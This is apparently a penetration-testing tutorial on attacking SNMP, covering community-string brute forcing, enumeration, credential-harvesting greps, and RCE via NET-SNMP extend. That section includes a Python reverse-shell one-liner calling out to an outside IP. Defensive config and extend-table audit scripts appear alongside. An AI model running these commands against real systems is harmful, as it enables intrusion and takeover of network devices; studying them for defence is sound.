SNMP (Simple Network Management Protocol) is a protocol for monitoring the status of devices on a computer network: network equipment, IP phones, corporate servers or anything else that runs an SNMP agent.
SNMP runs over UDP, using port 161/UDP for agent queries and 162/UDP for traps. So-called community strings are used to authenticate a manager to the SNMP agent; they are, in effect, shared passwords. A community string grants either RO (read-only) or RW (read-write) permissions.
SNMP can not only monitor equipment status but also fully manage it: dump configs, change the configuration, etc. A pentester who obtains a community string therefore gains access to the equipment, though how much depends on whether the string found is an RO or an RW community string.
Community strings can be brute-forced with the onesixtyone utility, which takes a wordlist and the IP addresses of the target hosts as input. The targets will be:
- 10.10.100.10 — Cisco vIOS Switch
- 10.10.100.254 — Cisco vIOS Router
~$ onesixtyone -c communitystrings -i targets
~$ onesixtyone -c /usr/share/doc/onesixtyone/dict.txt $IP
We found out which community strings are used on those devices. This opens the way to exploitation.
Because SNMP produces such a wealth of information about target devices, it is an excellent tool for reconnaissance and enumeration. An SNMP manager (also known as a network management system, or NMS) is an application that runs continuously on the network. At a regular interval (usually every 5 to 15 minutes) it queries devices for their status. These devices are typically servers, routers, switches, wireless access points, hubs, and other devices capable of running the SNMP service. The SNMP service has an agent that listens for incoming manager queries. The manager must identify itself to the agent by its community string, a text identifier that must be the same on both the manager and the device; if the manager uses a different community string, the device ignores it. The default community strings on SNMP installations are typically public and private, but they can easily be changed. SNMPv1 and v2c send everything in cleartext; only version 3 offers authentication and encryption. Usually the NMS does the querying, but an agent can also be configured to raise a trap (an alert) when some threshold is met. Traps can be set on any number of counters, such as low disk space, high CPU temperature, high CPU or RAM utilization, a congested interface, and security violations.
There are three basic categories of SNMP exploits:
- To sniff cleartext SNMP communications between managers and agents to obtain the community string or information from the devices. This can include statistics about hardware, interface traffic, services, users, groups, route tables, listening ports, running processes, and much more.
- To pose as an SNMP manager, providing the correct community string, and enumerate information from SNMP agents.
- To exploit the implicit trust SNMP managers have with the assets they manage. Most NMSs do not carefully validate the input from their agents. The attacker could passively or actively inject XSS data or other improperly formatted strings from the agent to the NMS. These could result in buffer overflows or arbitrary command injection.
Tools for SNMP Exploitation
Some common tools to exploit SNMP include:
- auxiliary/scanner/snmp/snmp_enum
- auxiliary/scanner/snmp/snmp_enumshares
- auxiliary/scanner/snmp/snmp_enumusers
- auxiliary/scanner/snmp/snmp_login
- exploit/multi/http/hp_sys_mgmt_exec
- exploit/windows/http/h_nnm_snmp
- snmp-brute.nse
- snmp-win32-software.nse
- snmp-win32-services.nse
nmap $IP -Pn -sU -p 161 --script=snmp-brute
nmap $IP -Pn -sU -p 161 --script=snmp-interfaces
snmpwalk -v2c -c {communityString} $IP
Metasploit has many SNMP-related scanners and exploits. You can search for modules by entering any of the following commands at the msfconsole:
search snmp
search scanner name:snmp
search exploit name:snmp -S great
Note: For more information about SNMP injection-based exploits, see https://information.rapid7.com/managed-to-mangled-snmp-exploits-for-network-management-systems.html
Enumerating SNMP
It is recommended to install the following so that each OID gathered from the device is shown with its name rather than only its number:
apt-get install snmp-mibs-downloader
download-mibs
# Finally, comment out the line saying "mibs :" in /etc/snmp/snmp.conf
sudo vi /etc/snmp/snmp.conf
If you know a valid community string, you can access the data using snmpwalk or snmp-check:
snmpbulkwalk -c [COMM_STRING] -v [VERSION] [IP] . #Don't forget the final dot
snmpbulkwalk -c public -v2c 10.10.11.136 .
snmpwalk -v [VERSION_SNMP] -c [COMM_STRING] [DIR_IP]
snmpwalk -v [VERSION_SNMP] -c [COMM_STRING] [DIR_IP] 1.3.6.1.2.1.4.34.1.3 #Get IPv6, needed dec2hex
snmpwalk -v [VERSION_SNMP] -c [COMM_STRING] [DIR_IP] NET-SNMP-EXTEND-MIB::nsExtendObjects #get extended
snmpwalk -v [VERSION_SNMP] -c [COMM_STRING] [DIR_IP] .1 #Enum all
snmp-check [DIR_IP] -p [PORT] -c [COMM_STRING]
nmap --script "snmp* and not snmp-brute" <target>
braa <community string>@<IP>:.1.3.6.* #Bruteforce specific OID
Thanks to extended queries (download-mibs), even more about the system can be enumerated with the following command:
snmpwalk -v X -c public <IP> NET-SNMP-EXTEND-MIB::nsExtendOutputFull
SNMP exposes a lot of information about the host; things you may find interesting include: network interfaces (IPv4 and IPv6 addresses), usernames, uptime, server/OS version, and running processes (whose command lines may contain passwords).
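As an added example (not part of the original notes), here is a Python helper for the "dec2hex" step the IPv6 query above needs: it parses numeric snmpwalk output (`snmpwalk -On ...`) of IP-MIB::ipAddressIfIndex (1.3.6.1.2.1.4.34.1.3) and decodes the ipAddressAddrType.ipAddressAddr index into IPv4/IPv6 addresses. The sample walk output is constructed.

```python
import ipaddress
import re

# OID prefix of IP-MIB::ipAddressIfIndex, the table walked in the command above.
IP_ADDRESS_IFINDEX = [1, 3, 6, 1, 2, 1, 4, 34, 1, 3]

# Constructed snmpwalk -On output: one IPv4 row and two IPv6 rows.
SAMPLE_WALK = """\
.1.3.6.1.2.1.4.34.1.3.1.4.10.10.100.10 = INTEGER: 1
.1.3.6.1.2.1.4.34.1.3.2.16.254.128.0.0.0.0.0.0.0.0.0.0.0.0.0.1 = INTEGER: 2
.1.3.6.1.2.1.4.34.1.3.2.16.32.1.13.184.0.0.0.0.0.0.0.0.0.0.0.1 = INTEGER: 2
"""

LINE_RE = re.compile(r"^\.?(?P<oid>[\d.]+)\s*=\s*INTEGER:\s*(?P<ifindex>\d+)\s*$")


def decode_index(index_parts):
    """Decode the ipAddressAddrType.ipAddressAddr index into an address.
    Layout: <type>.<length>.<octet>...; type 1 = ipv4 (4 octets), 2 = ipv6 (16 octets)."""
    addr_type, length, *octets = index_parts
    if length != len(octets):
        raise ValueError("index length does not match number of octets")
    raw = bytes(octets)
    if addr_type == 1 and length == 4:
        return ipaddress.IPv4Address(raw)
    if addr_type == 2 and length == 16:
        return ipaddress.IPv6Address(raw)
    raise ValueError(f"unsupported address type {addr_type} with length {length}")


def parse_ip_address_table(walk_text):
    """Return [(address, ifIndex), ...] for every ipAddressIfIndex row in the walk."""
    rows = []
    prefix_len = len(IP_ADDRESS_IFINDEX)
    for line in walk_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        parts = [int(p) for p in m.group("oid").split(".")]
        if parts[:prefix_len] != IP_ADDRESS_IFINDEX:
            continue  # some other OID in the same walk
        addr = decode_index(parts[prefix_len:])
        rows.append((str(addr), int(m.group("ifindex"))))
    return rows


if __name__ == "__main__":
    for addr, ifindex in parse_ip_address_table(SAMPLE_WALK):
        print(f"ifIndex {ifindex}: {addr}")
```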
Dangerous Settings
From https://academy.hackthebox.com/module/112/section/1075
Setting | Description
--- | ---
rwuser noauth | Provides access to the full OID tree without authentication.
rwcommunity {communityString} {IPv4 address} | Provides access to the full OID tree regardless of where the requests were sent from.
rwcommunity6 {communityString} {IPv6 address} | Same access as with rwcommunity, but using IPv6.
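The following Python check is added here (it is not part of the HTB module) so a defender can find the directives from the table above, plus default community strings, in an snmpd.conf before an attacker does. The configuration fragment is constructed; the assumption that an rwuser line without a level defaults to auth follows net-snmp's snmpd.conf documentation.

```python
# Constructed snmpd.conf fragment mixing weak lines with acceptable ones.
SAMPLE_SNMPD_CONF = """\
# constructed sample, not a real configuration
rocommunity public
rwcommunity private 10.10.100.0/24
rwcommunity6 private
rwuser admin noauth
rocommunity monitoring 10.10.100.5 -V systemonly
rwuser netops priv
"""

DEFAULT_COMMUNITIES = {"public", "private"}


def audit_snmpd_conf(text):
    """Return [(line_no, finding), ...] for write-capable, unauthenticated or default access."""
    findings = []
    for no, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()  # drop comments and blank lines
        if not line:
            continue
        tokens = line.split()
        directive, args = tokens[0].lower(), tokens[1:]
        community = args[0] if args else ""
        if directive in ("rwcommunity", "rwcommunity6"):
            # The optional second argument restricts the source; "default" means any host.
            source = args[1] if len(args) > 1 and not args[1].startswith("-") else "default"
            if source == "default":
                findings.append((no, f"{directive}: write access from any source"))
            if community.lower() in DEFAULT_COMMUNITIES:
                findings.append((no, f"{directive}: default community string"))
        elif directive == "rwuser":
            # Syntax: rwuser USER [noauth|auth|priv]; net-snmp defaults to auth (assumption).
            level = args[1].lower() if len(args) > 1 else "auth"
            if level == "noauth":
                findings.append((no, "rwuser noauth: write access without authentication"))
        elif directive in ("rocommunity", "rocommunity6"):
            if community.lower() in DEFAULT_COMMUNITIES:
                findings.append((no, f"{directive}: default community string"))
    return findings


if __name__ == "__main__":
    for no, finding in audit_snmpd_conf(SAMPLE_SNMPD_CONF):
        print(f"line {no}: {finding}")
```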
Check for ‘rw’ Authorization
# -v1 is the SNMP version
snmpwalk -v1 -c {communityString} $IP
# lists
{sysName} = STRING: {oldValue}
# then try to write a new value (host, OID, type s = string, value)
snmpset -v1 -c {communityString} $IP {sysName} s {newValue}
snmpwalk -v1 -c {communityString} $IP
# if the community is RW, this now lists
{sysName} = STRING: {newValue}
SNMP RCE
This post was copied from https://rioasmara.com/2021/02/05/snmp-arbitary-command-execution-and-shell/
SNMP is sometimes overlooked by the administrator of the device or server and left in its default configuration. An SNMP community with write permissions (rwcommunity) on the Linux operating system can be abused to let the attacker execute a command on the server.
Extending the Services
While you are not able to modify existing entries that were configured in snmpd.conf, it is possible to add additional commands over SNMP, because the "MAX-ACCESS" permission setting in the MIB definition is set to "read-create".
Adding a new command basically works by appending an additional row to the “nsExtendObjects” table.
snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c c0nfig localhost \
'nsExtendStatus."evilcommand"' = createAndGo \
'nsExtendCommand."evilcommand"' = /bin/echo \
'nsExtendArgs."evilcommand"' = 'hello world'
This injects a command to run on the SNMP service. NET-SNMP-EXTEND-MIB requires that you always provide the absolute path to the executable. The called binary/script must also exist and be executable.
The injected command is executed by reading it back with snmpwalk:
snmpwalk -v2c -c SuP3RPrivCom90 10.129.2.26 NET-SNMP-EXTEND-MIB::nsExtendObjects
This shows that the command is /bin/echo.
The command is executed whenever the object is read (run-on-read).
The command /bin/echo "hello rio is here" was executed during our snmpwalk read.
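As an added defensive example (not from the copied post), this Python script parses a snmpwalk of NET-SNMP-EXTEND-MIB::nsExtendObjects and flags extend entries whose command is not on an assumed allowlist or whose nsExtendStorage is not permanent, i.e. rows created over SNMP rather than in snmpd.conf. The walk output and the allowlist are constructed.

```python
import re
from collections import defaultdict

# Constructed snmpwalk output: one entry from snmpd.conf, one added via snmpset.
SAMPLE_EXTEND_WALK = """\
NET-SNMP-EXTEND-MIB::nsExtendNumEntries.0 = INTEGER: 2
NET-SNMP-EXTEND-MIB::nsExtendCommand."disk" = STRING: /usr/local/bin/check_disk
NET-SNMP-EXTEND-MIB::nsExtendCommand."evilcommand" = STRING: /bin/echo
NET-SNMP-EXTEND-MIB::nsExtendArgs."disk" = STRING:
NET-SNMP-EXTEND-MIB::nsExtendArgs."evilcommand" = STRING: hello world
NET-SNMP-EXTEND-MIB::nsExtendStorage."disk" = INTEGER: permanent(4)
NET-SNMP-EXTEND-MIB::nsExtendStorage."evilcommand" = INTEGER: volatile(2)
NET-SNMP-EXTEND-MIB::nsExtendStatus."disk" = INTEGER: active(1)
NET-SNMP-EXTEND-MIB::nsExtendStatus."evilcommand" = INTEGER: active(1)
"""

# Commands the administrator knowingly configured in snmpd.conf (assumed allowlist).
EXPECTED_COMMANDS = {"/usr/local/bin/check_disk"}

# Matches: NET-SNMP-EXTEND-MIB::<column>."<name>" = <TYPE>: <value>
ROW_RE = re.compile(
    r'^NET-SNMP-EXTEND-MIB::(?P<col>nsExtend\w+)\."(?P<name>[^"]*)"\s*=\s*\w+:\s?(?P<val>.*)$'
)


def parse_extend_table(walk_text):
    """Group the walk into {entry_name: {column: value}}."""
    rows = defaultdict(dict)
    for line in walk_text.splitlines():
        m = ROW_RE.match(line.rstrip())
        if m:
            rows[m.group("name")][m.group("col")] = m.group("val").strip()
    return dict(rows)


def suspicious_extend_entries(walk_text, expected=EXPECTED_COMMANDS):
    """Return [(name, command, [reasons]), ...] for entries worth investigating."""
    findings = []
    for name, cols in parse_extend_table(walk_text).items():
        cmd = cols.get("nsExtendCommand", "")
        storage = cols.get("nsExtendStorage", "")
        reasons = []
        if cmd not in expected:
            reasons.append("command not in allowlist")
        if not storage.startswith("permanent"):  # permanent = defined in snmpd.conf
            reasons.append("not from snmpd.conf (created over SNMP)")
        if reasons:
            findings.append((name, cmd, reasons))
    return findings
```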
Getting the Shell from Net-SNMP Extend
In this section, I would like to discuss how to gain a server shell to control the server.
You can use the python script developed by mxrch, which can be downloaded from https://github.com/mxrch/snmp-shell.git
You can install the prerequisites to run it:
sudo apt install snmp snmp-mibs-downloader rlwrap -y
git clone https://github.com/mxrch/snmp-shell
cd snmp-shell
sudo python3 -m pip install -r requirements.txt
Creating reverse shell
You can also create a reverse shell manually by injecting the command below into the SNMP agent:
snmpset -m +NET-SNMP-EXTEND-MIB -v 2c -c SuP3RPrivCom90 10.129.2.26 'nsExtendStatus."command10"' = createAndGo 'nsExtendCommand."command10"' = /usr/bin/python3.6 'nsExtendArgs."command10"' = '-c "import sys,socket,os,pty;s=socket.socket();s.connect((\"10.10.14.84\",8999));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(\"/bin/sh\")"'
Run snmpwalk to trigger the command execution.
Our netcat listener receives the reverse shell connection from the victim, which allows us to gain control over the victim machine.
Massive SNMP
Braa is a mass SNMP scanner. The intended usage of such a tool is, of course, making SNMP queries – but unlike snmpwalk from net-snmp, it is able to query dozens or hundreds of hosts simultaneously, and in a single process. Thus, it consumes very few system resources and does the scanning VERY fast.
Braa implements its OWN snmp stack, so it does NOT need any SNMP libraries like net-snmp.
Syntax: braa [Community-string]@[IP of SNMP server]:[iso id]
braa ignite123@192.168.1.125:.1.3.6.*
This can extract many MB of information that you cannot process manually.
So, let's look for the most interesting information (from https://blog.rapid7.com/2016/05/05/snmp-data-harvesting-during-penetration-testing/):
Devices
One of the first things I do is extract the sysDescr .1.3.6.1.2.1.1.1.0 MIB data from each file to determine what devices I have harvested information from. This can easily be done using the following grep command:
grep ".1.3.6.1.2.1.1.1.0" *.snmp
Identify private string
As an example, if I can identify the private community string used by an organization on their Cisco IOS routers, then I could possibly use that community string to extract the running configurations from those routers. The best method for finding such data has often been related to SNMP trap data. So again, using the following grep we can parse through a lot of MIB data quickly, searching for the keyword "trap":
grep -i "trap" *.snmp
Usernames/passwords
Another area of interest is logs: I have discovered that some devices hold logs within the MIB tables. These logs can also contain failed logon attempts. Think about the last time you logged into a device via Telnet or SSH and inadvertently entered your password as the username. I typically search for keywords such as fail, failed or login and examine that data to see if there is anything of value.
grep -i "login\|fail" *.snmp
Emails
grep -E -o "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,6}\b" *.snmp
Modifying SNMP values
You can use NetScanTools to modify values. You will need to know the private string in order to do so.
Spoofing
If there is an ACL that only allows some IPs to query the SNMP service, you can spoof one of these addresses inside the UDP packet and sniff the traffic.
Examine SNMP Configuration files
- snmp.conf
- snmpd.conf
- snmp-config.xml